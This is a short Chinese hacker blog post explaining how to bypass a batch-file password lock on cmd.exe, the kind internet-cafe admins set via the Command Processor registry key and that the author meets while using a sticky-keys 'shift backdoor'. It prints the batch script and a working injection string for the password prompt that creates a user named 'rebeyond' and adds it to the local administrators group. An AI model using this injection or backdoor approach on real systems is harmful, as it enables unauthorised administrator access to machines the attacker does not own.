批处理也玩注入

以前在用shift后门的时候经常遇到个加密的cmd，而且网上也有一篇介绍给网管们防止注入的批处理，然后把那个批处理的路径放到HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Command processor里，这样系统启动cmd就会首先执行那个批处理，这样就起到了加密cmd的作用，加密批处理内容如下：

　　echo 本网吧欢迎您

　　echo 你丫想干什么?要密码的哦～

　　:start

　　set /p pass=请输入CMD密码:

　　if %pass%==mima goto ok

　　if %time%==0 goto end

　　set /A times=%time%-1

　　:end

　　exit

　　cls

　　:ok

　　title 密码正确!欢迎进入DOS的世界!

　　Pause

　　执行后出现：，输错密码后会自动退出，无法执行命令!

　　这里是定义了一个变量存储密码，然后用“==”验证，我们知道cmd在执行的时候有个预处理过程，就是会把变量替换成内容，然后再执行，所以我们在输入密码的时候，如果输入这样一句："1"=="1" (net user rebeyond rebeyond /add&net localgroup administrators rebeyond /add)&rem ,这样系统在把我们输入的密码和%pass%比较的那句就会变成这样：

　　If "1"=="1" (net user rebeyond3 reb /add&net localgroup administrators rebeyond3 /add)&rem ==mima goto ok,这样if判断的内容就是”1”==”1”,显然是成立的，然后就会执行括号里的内容，这样就实现了通过输入变量对批处理的注入，同时也绕过了密码验证而执行了我们的命令，我们可以通过&符号来一次执行多个命令，这样批处理的加密就对我们起不了任何作用了!由于我们不知道执行成功后会跳转到哪一个标签，所以暂时不能做到完美破解，我试图想通过echo显示出源码，但是不行，但是现在已经可以通过&连接执行多条命令了，所以对我们来说已经足够了~!!hoho